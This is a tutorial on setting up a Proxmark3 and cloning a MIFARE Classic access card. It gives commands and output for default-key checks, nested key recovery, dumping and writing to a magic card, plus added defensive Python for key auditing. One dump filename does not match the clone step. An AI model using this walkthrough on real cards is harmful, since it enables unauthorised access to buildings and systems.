PM3 Environment Setup and M1 Card Cloning

PM3 Environment Setup

Setting up the environment on Windows is a hassle. If you have a virtual machine you can use that, but I strongly recommend WSL (Windows Subsystem for Linux); it is very friendly.
Below is the setup on Ubuntu, following the PM3 Wiki.
First, update the package lists and upgrade:

sudo apt-get update && sudo apt-get upgrade

Then install the required dependencies:

sudo apt install p7zip git build-essential libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config wget libncurses5-dev gcc-arm-none-eabi libstdc++-arm-none-eabi-newlib libpcsclite-dev pcscd

Clone the source:

git clone https://github.com/proxmark/proxmark3.git

You can of course use third-party firmware, such as Iceman's:

git clone https://github.com/RfidResearchGroup/proxmark3.git

Then pull the latest changes and set up the udev rule and serial-port permissions (the dialout group change takes effect after you log in again):

cd proxmark3
git pull
sudo cp -rf driver/77-mm-usb-device-blacklist.rules /etc/udev/rules.d/77-mm-usb-device-blacklist.rules
sudo udevadm control --reload-rules
sudo adduser $USER dialout

Compile the sources:

make clean && make all

Now plug in the PM3. Since I'm using WSL, Ubuntu shares the serial ports with the Windows host, so the port number has to be determined first; mine was COM7, which maps to /dev/ttyS7, and then it can be connected directly:

sudo ./proxmark3 /dev/ttyS7

Cracking the M1 Card

First identify the card type: measure the antenna signal with no card present.

proxmark3> hw tune

Measuring antenna characteristics, please wait.........
# LF antenna: 24.61 V @   125.00 kHz
# LF antenna: 29.84 V @   134.00 kHz
# LF optimal: 31.21 V @   130.43 kHz
# HF antenna: 24.53 V @    13.56 MHz
Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.

Place the card on the HF antenna and measure again:

proxmark3> hw tune

Measuring antenna characteristics, please wait.........
# LF antenna: 25.16 V @   125.00 kHz
# LF antenna: 30.94 V @   134.00 kHz
# LF optimal: 32.31 V @   130.43 kHz
# HF antenna: 19.60 V @    13.56 MHz
Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.

The HF voltage changes noticeably, so this is a high-frequency card; the same method identifies low-frequency cards (the LF voltage would drop instead). A further command identifies it as an M1 (MIFARE Classic 1K) card:

proxmark3> hf search

 UID : 60 64 7d 26
ATQA : 00 04
 SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
No chinese magic backdoor command detected
Prng detection: WEAK

Valid ISO14443A Tag Found - Quiting Search
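The antenna-loading test above can be automated. As an added example (not code from the original post or from the Proxmark3 project), the Python below parses the two `hw tune` outputs, computes the relative voltage drop per band, and reports which antenna the card loads. The two sample outputs are copied from the runs above; the 10% drop threshold is an assumption of this example, not a Proxmark3 value.

```python
import re

# Matches the per-band lines of "hw tune", e.g. "# HF antenna: 24.53 V @    13.56 MHz"
_ANTENNA_LINE = re.compile(
    r"#\s*(?P<band>LF|HF) antenna:\s+(?P<volts>[\d.]+) V @\s+(?P<freq>[\d.]+) (?P<unit>kHz|MHz)"
)

# Sample outputs copied from the two "hw tune" runs above (no card, then HF card placed)
NO_CARD = """Measuring antenna characteristics, please wait.........
# LF antenna: 24.61 V @   125.00 kHz
# LF antenna: 29.84 V @   134.00 kHz
# LF optimal: 31.21 V @   130.43 kHz
# HF antenna: 24.53 V @    13.56 MHz
"""

HF_CARD = """Measuring antenna characteristics, please wait.........
# LF antenna: 25.16 V @   125.00 kHz
# LF antenna: 30.94 V @   134.00 kHz
# LF optimal: 32.31 V @   130.43 kHz
# HF antenna: 19.60 V @    13.56 MHz
"""


def parse_tune(output):
    """Return {band: {frequency_in_kHz: volts}} for the LF/HF antenna lines."""
    bands = {"LF": {}, "HF": {}}
    for m in _ANTENNA_LINE.finditer(output):
        scale = 1000.0 if m.group("unit") == "MHz" else 1.0
        freq_khz = float(m.group("freq")) * scale
        bands[m.group("band")][freq_khz] = float(m.group("volts"))
    return bands


def band_drops(baseline, with_card):
    """Relative voltage drop (base - card) / base for every frequency measured in both runs."""
    base, card = parse_tune(baseline), parse_tune(with_card)
    drops = {}
    for band in ("LF", "HF"):
        for freq, v0 in base[band].items():
            if freq in card[band] and v0 > 0:
                drops[(band, freq)] = (v0 - card[band][freq]) / v0
    return drops


def classify_card(baseline, with_card, threshold=0.10):
    """'HF' or 'LF' if that antenna's voltage fell by at least `threshold` (10% assumed), else 'none'."""
    drops = band_drops(baseline, with_card)
    worst = {}
    for (band, _freq), drop in drops.items():
        worst[band] = max(worst.get(band, 0.0), drop)  # a rise counts as no drop
    if not worst:
        return "none"
    band, drop = max(worst.items(), key=lambda kv: kv[1])
    return band if drop >= threshold else "none"


if __name__ == "__main__":
    for key, drop in sorted(band_drops(NO_CARD, HF_CARD).items()):
        print(f"{key[0]} @ {key[1]:.2f} kHz: {drop:+.1%}")
    print("card type:", classify_card(NO_CARD, HF_CARD))
```

On the two runs above the HF voltage falls by about 20% while both LF readings actually rise slightly, so the card is classified as HF; a low-frequency card would show the mirror image.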

Check whether the sectors use default keys:

proxmark3> hf mf chk *1 ? t
--chk keys. sectors:16, block no:  0, key type:?, eml:y, dmp=n checktimeout=471 us
No key specified, trying default keys
chk default key[ 0] ffffffffffff
chk default key[ 1] 000000000000
chk default key[ 2] a0a1a2a3a4a5
chk default key[ 3] b0b1b2b3b4b5
chk default key[ 4] aabbccddeeff
chk default key[ 5] 1a2b3c4d5e6f
chk default key[ 6] 123456789abc
chk default key[ 7] 010203040506
chk default key[ 8] 123456abcdef
chk default key[ 9] abcdef123456
chk default key[10] 4d3a99c351dd
chk default key[11] 1a982c7e459a
chk default key[12] d3f7d3f7d3f7
chk default key[13] 714c5c886e97
chk default key[14] 587ee5f9350f
chk default key[15] a0478cc39091
chk default key[16] 533cb6c723f6
chk default key[17] 8fd0a4f256e9

To cancel this operation press the button on the proxmark...
--o
|---|----------------|----------------|
|sec|key A           |key B           |
|---|----------------|----------------|
|000|  ffffffffffff  |  ffffffffffff  |
|001|        ?       |        ?       |
|002|  ffffffffffff  |  ffffffffffff  |
|003|        ?       |        ?       |
|004|  ffffffffffff  |  ffffffffffff  |
|005|  ffffffffffff  |  ffffffffffff  |
|006|  ffffffffffff  |  ffffffffffff  |
|007|  ffffffffffff  |  ffffffffffff  |
|008|  ffffffffffff  |  ffffffffffff  |
|009|  ffffffffffff  |  ffffffffffff  |
|010|  ffffffffffff  |  ffffffffffff  |
|011|  ffffffffffff  |  ffffffffffff  |
|012|  ffffffffffff  |  ffffffffffff  |
|013|  ffffffffffff  |  ffffffffffff  |
|014|  ffffffffffff  |  ffffffffffff  |
|015|  ffffffffffff  |  ffffffffffff  |
|---|----------------|----------------|
28 keys(s) found have been transferred to the emulator memory

Run help for the detailed usage of each command.
Some sectors turn out to use the default key ffffffffffff.
M1 cards have a vulnerability: with the key of one known sector, the keys of the encrypted sectors can be recovered (the nested attack):

proxmark3> hf mf nested 1 0 A FFFFFFFFFFFF d
--nested. sectors:16, block no:  0, key type:A, eml:n, dmp=y checktimeout=471 us
Testing known keys. Sector count=16
nested...
-----------------------------------------------
uid:60647d26 trgbl=4 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=4 trgkey=1
Setting authentication timeout to 103us
Found valid key:01206f340100
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=4 trgkey=0
Setting authentication timeout to 103us
Found valid key:112233445566
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
Found valid key:50f6a442e26d
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
Found valid key:e59925b18b43


-----------------------------------------------
Nested statistic:
Iterations count: 17
Time in nested: 8.851 (0.521 sec per key)
|---|----------------|---|----------------|---|
|sec|key A           |res|key B           |res|
|---|----------------|---|----------------|---|
|000|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|001|  112233445566  | 1 |  01206f340100  | 1 |
|002|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|003|  50f6a442e26d  | 1 |  e59925b18b43  | 1 |
|004|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|005|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|006|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|007|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|008|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|009|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|010|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|011|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|012|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|013|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|014|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|015|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|---|----------------|---|----------------|---|
Printing keys to binary file dumpkeys.bin...

The keys of the other encrypted sectors have been recovered and written to dumpkeys.bin. This file has to be converted into a format PM3 understands before the access card can be cloned:

proxmark3> script run dumptoemul.lua
--- Executing: ./scripts/dumptoemul.lua, args''
Wrote an emulator-dump to the file 2CF0550B.eml
 
-----Finished
proxmark3>
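The chk run and the nested result above together show the defender's problem with this card: two sectors carry custom keys, but every other sector still uses ffffffffffff, and one known key was all nested needed. As an added example (not the blog's own code and not a Proxmark3 script), the Python below reads a dumpkeys.bin image and reports which sectors still use one of the keys from the chk list above and whether the card is therefore exposed. Assumptions of this example: a 1K card with 16 sectors, dumpkeys.bin laid out as sixteen key A entries followed by sixteen key B entries (6 bytes each), a weak PRNG as reported by `hf search` above, and a sample image constructed from the key table printed by the nested run.

```python
# Default keys tried by "hf mf chk" in the run above
DEFAULT_KEYS = {
    "ffffffffffff", "000000000000", "a0a1a2a3a4a5", "b0b1b2b3b4b5",
    "aabbccddeeff", "1a2b3c4d5e6f", "123456789abc", "010203040506",
    "123456abcdef", "abcdef123456", "4d3a99c351dd", "1a982c7e459a",
    "d3f7d3f7d3f7", "714c5c886e97", "587ee5f9350f", "a0478cc39091",
    "533cb6c723f6", "8fd0a4f256e9",
}

SECTORS_1K = 16   # MIFARE Classic 1K
KEY_LEN = 6       # bytes per key


def build_sample_dumpkeys():
    """Constructed dumpkeys.bin image using the keys from the nested result table above."""
    key_a = ["ffffffffffff"] * SECTORS_1K
    key_b = ["ffffffffffff"] * SECTORS_1K
    key_a[1], key_b[1] = "112233445566", "01206f340100"
    key_a[3], key_b[3] = "50f6a442e26d", "e59925b18b43"
    return bytes.fromhex("".join(key_a) + "".join(key_b))


def parse_dumpkeys(data, sectors=SECTORS_1K):
    """Split a dumpkeys.bin image into (key A, key B) hex pairs, one per sector.

    Assumed layout: all key A entries (sectors * 6 bytes) followed by all key B entries.
    """
    expected = 2 * sectors * KEY_LEN
    if len(data) != expected:
        raise ValueError(f"expected {expected} bytes for {sectors} sectors, got {len(data)}")
    half = sectors * KEY_LEN
    keys_a, keys_b = data[:half], data[half:]
    return [
        (keys_a[i * KEY_LEN:(i + 1) * KEY_LEN].hex(), keys_b[i * KEY_LEN:(i + 1) * KEY_LEN].hex())
        for i in range(sectors)
    ]


def audit_keys(keys, weak_prng=True):
    """Report which sectors still use a well-known key and whether the card is exposed.

    A card with a weak PRNG (as "hf search" reported above) is open to nested key
    recovery as soon as any single key is known, so one default sector is enough.
    """
    default_sectors = [s for s, (a, b) in enumerate(keys) if a in DEFAULT_KEYS or b in DEFAULT_KEYS]
    custom_sectors = [s for s in range(len(keys)) if s not in default_sectors]
    return {
        "default_sectors": default_sectors,
        "custom_sectors": custom_sectors,
        "exposed": weak_prng and len(default_sectors) > 0,
    }


if __name__ == "__main__":
    report = audit_keys(parse_dumpkeys(build_sample_dumpkeys()))
    print("sectors with a default key:", report["default_sectors"])
    print("sectors with custom keys:  ", report["custom_sectors"])
    print("whole card recoverable via nested:", report["exposed"])
```

Because one known key was enough for nested to recover sectors 1 and 3 above, the report treats a single default sector as exposing the entire card: the custom keys on sectors 1 and 3 buy nothing while sector 0 (and thirteen others) stay at ffffffffffff. Run the audit on the dumpkeys.bin of a fresh card batch before deployment rather than after a clone has turned up.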

Then place the blank (Chinese magic) card on the HF antenna and write the data to it:

proxmark3> hf mf cload 60647D26
Chinese magic backdoor commands (GEN 1a) detected
Loading magic mifare 1K
Loaded from file: 60647D26.eml

All done!!!

References:
https://github.com/Proxmark/proxmark3/wiki/Ubuntu-Linux
https://www.cnblogs.com/k1two2/p/5706516.html
https://lzy-wi.github.io/2018/07/26/proxmark3/
